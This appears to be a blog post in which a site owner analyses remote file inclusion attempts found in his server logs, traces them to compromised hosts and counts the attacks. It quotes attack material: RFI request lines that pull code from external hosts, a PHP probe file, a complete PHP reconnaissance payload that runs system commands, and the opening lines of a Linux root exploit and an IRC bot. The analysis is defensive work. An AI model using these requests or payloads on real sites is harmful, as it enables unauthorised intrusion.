03.07
For a month that I have been tracking down the requests that are made to my site, looking at the logs I was able to find fourteen attack attempts. The attempts originated from the following IP addresses.
41.204.218.*
58.150.99.*
210.116.103.*The requests made in the attempts were crafted to test for remote file inclusions.
/contrib/yabbse/poc.php?poc_root_path=http://*******.kr/~eco-max/gboard/lib/id1.txt
/include/admin.lib.inc.php?site_path=http://*******.co.za/content_old/themes/a.txt?
The two files, a.txt and id1.txt, used in the requests boiled down to
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>When executed by PHP the output would contain only FeeLCoMzFeeLCoMz which is a easy way for the attacker to verify that the site is vulnerable to remote file inclusions.
After checking the IP addresses from were the requests originated, I wasn't surprised when I found out they came from the compromised sites that hosted the files. In one of the compromised sites, I was able to list the contents of the directory that contained the id1.txt file.
In that directory there were present files that indicated there were made attempts to exploit local privilege escalation vulnerabilities in Linux, some PERL scripts that connect to an IRC server (which isn't available any more) in order to receive orders and two Python scripts.
# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : 2.6.18 2008 Exploit's İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL
#define _GNU_SOURCE
#include <stdio.h>
(...)#!/usr/bin/perl
print('
########################################
## LoDoyo Scanner Bot v9.1 ##
## By Special Edition By LoDoYo ##
## ? NOV-Des 2009, NKN - TeaM ##
########################################
');
######################################################
## Usage: ##
## perl lodoyocrew.pl <chan w/o #> <server> <port>##
(...)There were also present some text files that are simple log files of the requests made to other sites. Many of the sites that I was able to identify in those log files didn't host, at least not any more, the files belonging to the id1.txt family. This is a good thing since it will reduce the attack effectiveness. In those files there were also present requests made in order to find log files and AWStats report pages.
I picked eight of those requests and was able to download the access log files for five sites. In those access log files I found a lot of requests that belonged to the same family as the ones made to myf00.
After hacking up a Python script, the logs yielded 289199 requests in total that originated from 1612 unique IP addresses. There were a total of 132 SQL injection attempts, 2082 directory transversal's, 251872 remote file inclusion attempts. It can also be accounted that there are 154 hosts that still host files of the id1.txt family.
There is also some web shells in the list as well as some variations of the id1.txt file family that print some server related information when invoked in a remote file inclusion scenario.
<?
echo "Coracore<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "Coracore is my BoyFriend<br>";
exit;
?>